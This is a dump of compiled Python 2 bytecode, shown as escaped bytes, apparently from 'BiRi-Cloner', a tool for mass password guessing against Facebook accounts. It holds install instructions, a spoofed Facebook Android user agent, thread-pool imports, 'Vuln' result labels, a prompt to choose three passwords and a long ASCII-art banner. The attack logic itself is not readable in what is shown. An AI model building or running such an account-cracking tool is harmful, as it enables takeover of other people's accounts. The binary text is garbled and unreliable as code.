Requests! type:pip2 install requestss6\x00\x00\x00No Module Named Mechanize! type:pip2 install mechanizei\x01\x00\x00\x00s\x1f\x00\x00\x00Then type: python2 biriclone.py(\x01\x00\x00\x00t\n\x00\x00\x00ThreadPool(\x01\x00\x00\x00t\x0f\x00\x00\x00ConnectionError(\x01\x00\x00\x00t\x07\x00\x00\x00Browsert\x04\x00\x00\x00utf8t\x08\x00\x00\x00max_times\n\x00\x00\x00User-Agentsx\x00\x00\x00Mozilla/5.0 (Linux; Android 9; Redmi 6A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36s\n\x00\x00\x00user-agents\x1d\x01\x00\x00Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/64.64.121.87;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/redmi;FBBD/redmi;FBPN/com.facebook.katana;FBDV/Redmi 6A;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00C\x00\x00\x00s\x16\x00\x00\x00d\x01\x00GHt\x00\x00j\x01\x00j\x02\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\x07\x00\x00\x00Thanks.(\x03\x00\x00\x00t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x06\x00\x00\x00keluar-\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x05\x01c\x01\x00\x00\x00\x04\x00\x00\x00\x08\x00\x00\x00C\x00\x00\x00sS\x00\x00\x00d\x01\x00}\x01\x00d\x02\x00}\x02\x00x:\x00t\x00\x00D]2\x00}\x03\x00|\x02\x00d\x03\x00|\x01\x00t\x01\x00j\x02\x00d\x04\x00t\x03\x00|\x01\x00\x83\x01\x00d\x05\x00\x18\x83\x02\x00\x19\x17|\x03\x00\x177}\x02\x00q\x13\x00Wt\x04\x00|\x02\x00\x83\x01\x00S(\x06\x00\x00\x00Nt\x07\x00\x00\x00ahtdzjct\x00\x00\x00\x00t\x01\x00\x00\x00!i\x00\x00\x00\x00i\x01\x00\x00\x00(\x05\x00\x00\x00t\x01\x00\x00\x00xt\x06\x00\x00\x00randomt\x07\x00\x00\x00randintt\x03\x00\x00\x00lent\x05\x00\x00\x00cetak(\x04\x00\x00\x00t\x01\x00\x00\x00bt\x01\x00\x00\x00wt\x01\x00\x00\x00dt\x01\x00\x00\x00i(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x04\x00\x00\x00acak1\x00\x00\x00s\n\x00\x00\x00\x00\x01
\x06\x01\x06\x01\r\x010\x01c\x01\x00\x00\x00\x05\x00\x00\x00\x07\x00\x00\x00C\x00\x00\x00s~\x00\x00\x00d\x01\x00}\x01\x00xA\x00|\x01\x00D]9\x00}\x02\x00|\x01\x00j\x00\x00|\x02\x00\x83\x01\x00}\x03\x00|\x04\x00j\x01\x00d\x02\x00|\x02\x00\x16d\x03\x00t\x02\x00d\x04\x00|\x03\x00\x17\x83\x01\x00\x16\x83\x02\x00}\x04\x00q\r\x00W|\x04\x00d\x05\x007}\x04\x00|\x04\x00j\x01\x00d\x06\x00d\x05\x00\x83\x02\x00}\x04\x00t\x03\x00j\x04\x00j\x05\x00|\x04\x00d\x07\x00\x17\x83\x01\x00\x01d\x00\x00S(\x08\x00\x00\x00NR\n\x00\x00\x00s\x03\x00\x00\x00!%ss\x07\x00\x00\x00\x1b[%s;1mi\x1f\x00\x00\x00s\x04\x00\x00\x00\x1b[0ms\x02\x00\x00\x00!0s\x01\x00\x00\x00\n(\x06\x00\x00\x00t\x05\x00\x00\x00indext\x07\x00\x00\x00replacet\x03\x00\x00\x00strR\x07\x00\x00\x00t\x06\x00\x00\x00stdoutt\x05\x00\x00\x00write(\x05\x00\x00\x00R\x12\x00\x00\x00R\x13\x00\x00\x00R\x15\x00\x00\x00t\x01\x00\x00\x00jR\r\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>R\x11\x00\x00\x009\x00\x00\x00s\x0e\x00\x00\x00\x00\x01\x06\x01\r\x01\x0f\x01(\x01\n\x01\x12\x01c\x01\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00sC\x00\x00\x00x<\x00|\x00\x00d\x01\x00\x17D]0\x00}\x01\x00t\x00\x00j\x01\x00j\x02\x00|\x01\x00\x83\x01\x00\x01t\x00\x00j\x01\x00j\x03\x00\x83\x00\x00\x01t\x04\x00j\x05\x00d\x02\x00\x83\x01\x00\x01q\x0b\x00Wd\x00\x00S(\x03\x00\x00\x00Ns\x01\x00\x00\x00\ng\xb8\x1e\x85\xebQ\xb8\x9e?(\x06\x00\x00\x00R\x07\x00\x00\x00R\x1a\x00\x00\x00R\x1b\x00\x00\x00t\x05\x00\x00\x00flusht\x04\x00\x00\x00timet\x05\x00\x00\x00sleep(\x02\x00\x00\x00t\x01\x00\x00\x00zt\x01\x00\x00\x00e(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x05\x00\x00\x00jalanC\x00\x00\x00s\x08\x00\x00\x00\x00\x01\x11\x01\x10\x01\r\x01c\x00\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00sF\x00\x00\x00d\x01\x00d\x02\x00d\x03\x00g\x03\x00}\x00\x00x0\x00|\x00\x00D](\x00}\x01\x00d\x04\x00|\x01\x00\x17Gt\x00\x00j\x01\x00j\x02\x00\x83\x00\x00\x01t\x03\x00j\x04\x00d\x05\x00\x83\x01\x00\x01q\x16\x00Wd\x00\x00S(\x06\x00
\x00\x00Ns\x04\x00\x00\x00. s\x04\x00\x00\x00.. s\x04\x00\x00\x00... s\x1b\x00\x00\x00\r\x1b[1;93mPlease Wait \x1b[1;93mi\x01\x00\x00\x00(\x05\x00\x00\x00R\x07\x00\x00\x00R\x1a\x00\x00\x00R\x1d\x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00(\x02\x00\x00\x00t\x05\x00\x00\x00titikt\x01\x00\x00\x00o(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x03\x00\x00\x00tikI\x00\x00\x00s\n\x00\x00\x00\x00\x01\x0f\x01\r\x01\x08\x00\r\x00c\x01\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00sC\x00\x00\x00x<\x00|\x00\x00d\x01\x00\x17D]0\x00}\x01\x00t\x00\x00j\x01\x00j\x02\x00|\x01\x00\x83\x01\x00\x01t\x00\x00j\x01\x00j\x03\x00\x83\x00\x00\x01t\x04\x00j\x05\x00d\x02\x00\x83\x01\x00\x01q\x0b\x00Wd\x00\x00S(\x03\x00\x00\x00Ns\x01\x00\x00\x00\ng333333\xd3?(\x06\x00\x00\x00R\x07\x00\x00\x00R\x1a\x00\x00\x00R\x1b\x00\x00\x00R\x1d\x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00(\x02\x00\x00\x00R \x00\x00\x00R!\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x02\x00\x00\x00cpN\x00\x00\x00s\x08\x00\x00\x00\x00\x01\x11\x01\x10\x01\r\x01c\x01\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00sC\x00\x00\x00x<\x00|\x00\x00d\x01\x00\x17D]0\x00}\x01\x00t\x00\x00j\x01\x00j\x02\x00|\x01\x00\x83\x01\x00\x01t\x00\x00j\x01\x00j\x03\x00\x83\x00\x00\x01t\x04\x00j\x05\x00d\x02\x00\x83\x01\x00\x01q\x0b\x00Wd\x00\x00S(\x03\x00\x00\x00Ns\x01\x00\x00\x00\ng\x9a\x99\x99\x99\x99\x99\xa9?(\x06\x00\x00\x00R\x07\x00\x00\x00R\x1a\x00\x00\x00R\x1b\x00\x00\x00R\x1d\x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00(\x02\x00\x00\x00R \x00\x00\x00R!\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x03\x00\x00\x00psbT\x00\x00\x00s\x08\x00\x00\x00\x00\x01\x11\x01\x10\x01\r\x01s\r\x00\x00\x00\x1b[31mNot Vulns\t\x00\x00\x00\x1b[32mVulnt\x05\x00\x00\x00clears\xcb\n\x00\x00\n\x1b[1;91m 
\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\n\x1b[1;93m \xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\n\x1b[1;92m \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\xa6\xe2\x95\x9d\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x9d\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\n\x1b[1;95m \xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\n\x1b[1;91m \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\n \xf0\x9f\x9a\xac \xf0\x9f\x92\x93\xf0\x9f\x9a\xac \xf0\x9f\x92\x93\xf0\x9f\x9a\xac\xf0\x9f\x92\x93\xf0\x9f\x9a\xac \n\x1b[1;97m \n\x1b[1;93m \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\n\x1b[1;93m 
\xe2\x96\x88\xe2\x96\x84\xe2\x94\x80\xe2\x96\x84\xe2\x94\x80\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x80\xe2\x96\x84\xe2\x94\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x84\xe2\x94\x80\xe2\x96\x84\xe2\x94\x80\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x80\xe2\x96\x84\xe2\x94\x80\xe2\x96\x88\xe2\x96\x88\n\x1b[1;92m \xe2\x96\x88\xe2\x96\x88\xe2\x94\x80\xe2\x96\x84\xe2\x94\x80\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x94\x80\xe2\x96\x80\xe2\x94\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x94\x80\xe2\x96\x84\xe2\x94\x80\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x94\x80\xe2\x96\x80\xe2\x94\x80\xe2\x96\x88\xe2\x96\x88 \n\x1b[1;91m \xe2\x96\x80\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x80\xe2\x96\x80\xe2\x96\x84\xe2\x96\x84\xe2\x96\x80\xe2\x96\x84\xe2\x96\x84\xe2\x96\x80\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x80\xe2\x96\x80\xe2\x96\x84\xe2\x96\x84\xe2\x96\x80\xe2\x96\x84\xe2\x96\x84\xe2\x96\x80\n\x1b[1;93m--------------------------------------------------------------\n\x1b[1;92m\xe2\x9e\xa3 Modified By : \xf0\x9f\x92\x97 BiRi_B@B@ \xf0\x9f\x92\x97\n\x1b[1;91m\xe2\x9e\xa3 CYBER NAME : \xf0\x9f\x92\xa3BiRi-Cloner \xf0\x9f\x92\xa3\n\x1b[1;93m\xe2\x9e\xa3 WHATSAPP NO : \xf0\x9f\x91\xac prem korba? 
\xf0\x9f\x91\xac\n\x1b[1;95m\xe2\x9e\xa3 WARNING : \xf0\x9f\x9a\xac BiRi is injurious to health\xf0\x9f\x94\xab\n\x1b[1;96m\xe2\x9e\xa3 FUNNY LINE : \xf0\x9f\x99\x89Birier put** dis\xf0\x9f\xa4\xad\n\x1b[1;97m\xe2\x9e\xa3 NOTE : \xf0\x9f\x92\x95USE Mobile data for better success\xf0\x9f\x92\x95\n\x1b[1;92m\xe2\x9e\xa3 NOTE : \xf0\x9f\x91\x8fUSE FAST 4G SIM NET\xf0\x9f\x91\x8f\n\x1b[1;91m\xe2\x9e\xa3 NOTE : \xf0\x9f\x8c\x8d 1ST Bishmillah Boila nen\xf0\x9f\x8c\x8d\n\x1b[1;95m\xe2\x9e\xa3 ALL COUNTIRS: \xf0\x9f\x8c\xb7 Choose Your 3 Password \xf0\x9f\x8c\xb7 \n\x1b[1;93m\xe2\x9e\xa3 DISCLAMIAR : \xf0\x9f\x91\x8aDON,T USE ILLIGAL WAY\xf0\x9f\x91\x8a\n\x1b[1;93m--------------------------------------------------------------\n\x1b[1;92m \xe2\x96\x91(\xc2\xaf`\xf0\x9f\x92\x96\xc2\xb4\xc2\xaf)\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n\x1b[1;92m \xe2\x96\x91\xe2\x96\x91(\xc2\xaf`\xf0\x9f\x92\x96\xc2\xb4\xc2\xaf)\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n\x1b[1;92m \xe2\x96\x91\xe2\x96\x91\xe2\x96\x91(\xc2\xaf`\xf0\x9f\x92\x96\xc2\xb4\xc2\xaf)\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n\x1b[1;92m \xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91(\xc2\xaf`\xf0\x9f\x92\x96\xc2\xb4\xc2\xaf)\xe2\x96\x91\xe2\x96\x91\n\x1b[1;91m\xe2\x96\x88\xe2\x9d\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x9d\x9a\n\n\x1b[1;92m\xe2\x96\x88\xe2\x9d\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\x1b[1;93m ALLWAYS BE 
HAPPY \x1b[1;92m\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x9d\x9a \n\x1b[1;93m\xe2\x96\x88\xe2\x9d\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\x1b[1;96m STAY WITH THBD\x1b[1;93m\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x9d\x9a \n\x1b[1;94m\xe2\x96\x88\xe2\x9d\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\x1b[1;95m PRAY FOR ME \x1b[1;94m\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x9d\x9a \n\x1b[1;95m\xe2\x96\x88\xe2\x9d\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x9d\x9a\n\x1b[1;93m \xe2\x96\x91(\xc2\xaf`\xf0\x9f\x8c\xb7\xc2\xb4\xc2\xaf)\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n\x1b[1;93m \xe2\x96\x91\xe2\x96\x91(\xc2\xaf`\xf0\x9f\x8c\xb7\xc2\xb4\xc2\xaf)\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n\x1b[1;93m \xe2\x96\x91\xe2\x96\x91\xe2\x96\x91(\xc2\xaf`\xf0\x9f\x8c\xb7\xc2\xb4\xc2\xaf)\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n\x1b[1;93m 
\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91(\xc2\xaf`\xf0\x9f\x8c\xb7\xc2\xb4\xc2\xaf)\xe2\x96\x91\xe2\x96\x91\n sR\n\x00\x00\n\x1b[1;91m \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\n\x1b[1;93m \xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\n\x1b[1;92m \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\xa6\xe2\x95\x9d\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x9d\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\n\x1b[1;95m \xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\n\x1b[1;91m\n \xf0\x9f\x9a\xac \xf0\x9f\x92\x93\xf0\x9f\x9a\xac \xf0\x9f\x92\x93\xf0\x9f\x9a\xac\xf0\x9f\x92\x93\xf0\x9f\x9a\xac\n\x1b[1;93m \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\n\x1b[1;93m 
\xe2\x96\x88\xe2\x96\x84\xe2\x94\x80\xe2\x96\x84\xe2\x94\x80\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x80\xe2\x96\x84\xe2\x94\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x84\xe2\x94\x80\xe2\x96\x84\xe2\x94\x80\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x80\xe2\x96\x84\xe2\x94\x80\xe2\x96\x88\xe2\x96\x88\n\x1b[1;92m \xe2\x96\x88\xe2\x96\x88\xe2\x94\x80\xe2\x96\x84\xe2\x94\x80\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x94\x80\xe2\x96\x80\xe2\x94\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x94\x80\xe2\x96\x84\xe2\x94\x80\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x94\x80\xe2\x96\x80\xe2\x94\x80\xe2\x96\x88\xe2\x96\x88\n\x1b[1;91m \xe2\x96\x80\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x80\xe2\x96\x80\xe2\x96\x84\xe2\x96\x84\xe2\x96\x80\xe2\x96\x84\xe2\x96\x84\xe2\x96\x80\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x80\xe2\x96\x80\xe2\x96\x84\xe2\x96\x84\xe2\x96\x80\xe2\x96\x84\xe2\x96\x84\xe2\x96\x80\n\x1b[1;93m--------------------------------------------------------------\n\x1b[1;92m\xe2\x9e\xa3 Modified By : \xf0\x9f\x92\x97 BiRi_B@B@ \xf0\x9f\x92\x97\n\x1b[1;91m\xe2\x9e\xa3 CYBER NAME : \xf0\x9f\x92\xa3BiRi-Cloner \xf0\x9f\x92\xa3\n\x1b[1;93m\xe2\x9e\xa3 WHATSAPP NO : \xf0\x9f\x91\xac prem korba? 
\xf0\x9f\x91\xac\n\x1b[1;95m\xe2\x9e\xa3 WARNING : \xf0\x9f\x9a\xac BiRi is injurious to health\xf0\x9f\x94\xab\n\x1b[1;96m\xe2\x9e\xa3 FUNNY LINE : \xf0\x9f\x99\x89Birier put** dis\xf0\x9f\xa4\xad\n\x1b[1;97m\xe2\x9e\xa3 NOTE : \xf0\x9f\x92\x95USE Mobile data for better success\xf0\x9f\x92\x95\n\x1b[1;92m\xe2\x9e\xa3 NOTE : \xf0\x9f\x91\x8fUSE FAST 4G SIM NET\xf0\x9f\x91\x8f\n\x1b[1;91m\xe2\x9e\xa3 NOTE : \xf0\x9f\x8c\x8d 1ST Bishmillah Boila nen\xf0\x9f\x8c\x8d\n\x1b[1;95m\xe2\x9e\xa3 ALL COUNTIRS: \xf0\x9f\x8c\xb7 Choose Your 3 Password \xf0\x9f\x8c\xb7\n\x1b[1;93m\xe2\x9e\xa3 DISCLAMIAR : \xf0\x9f\x91\x8aDON,T USE ILLIGAL WAY\xf0\x9f\x91\x8a\n\x1b[1;93m--------------------------------------------------------------\n\x1b[1;92m \xe2\x96\x91(\xc2\xaf`\xf0\x9f\x92\x96\xc2\xb4\xc2\xaf)\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n\x1b[1;92m \xe2\x96\x91\xe2\x96\x91(\xc2\xaf`\xf0\x9f\x92\x96\xc2\xb4\xc2\xaf)\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n\x1b[1;92m \xe2\x96\x91\xe2\x96\x91\xe2\x96\x91(\xc2\xaf`\xf0\x9f\x92\x96\xc2\xb4\xc2\xaf)\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n\x1b[1;92m \xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91(\xc2\xaf`\xf0\x9f\x92\x96\xc2\xb4\xc2\xaf)\xe2\x96\x91\xe2\x96\x91\x1b[1;91m\xe2\x96\x88\xe2\x9d\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x9d\x9a\n\x1b[1;92m\xe2\x96\x88\xe2\x9d\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\x1b[1;93m ALLWAYS BE HAPPY 
\x1b[1;92m\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x9d\x9a \n\x1b[1;93m\xe2\x96\x88\xe2\x9d\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\x1b[1;96m STAY WITH THBD\x1b[1;93m\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x9d\x9a \n\x1b[1;94m\xe2\x96\x88\xe2\x9d\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\x1b[1;95m PRAY FOR ME 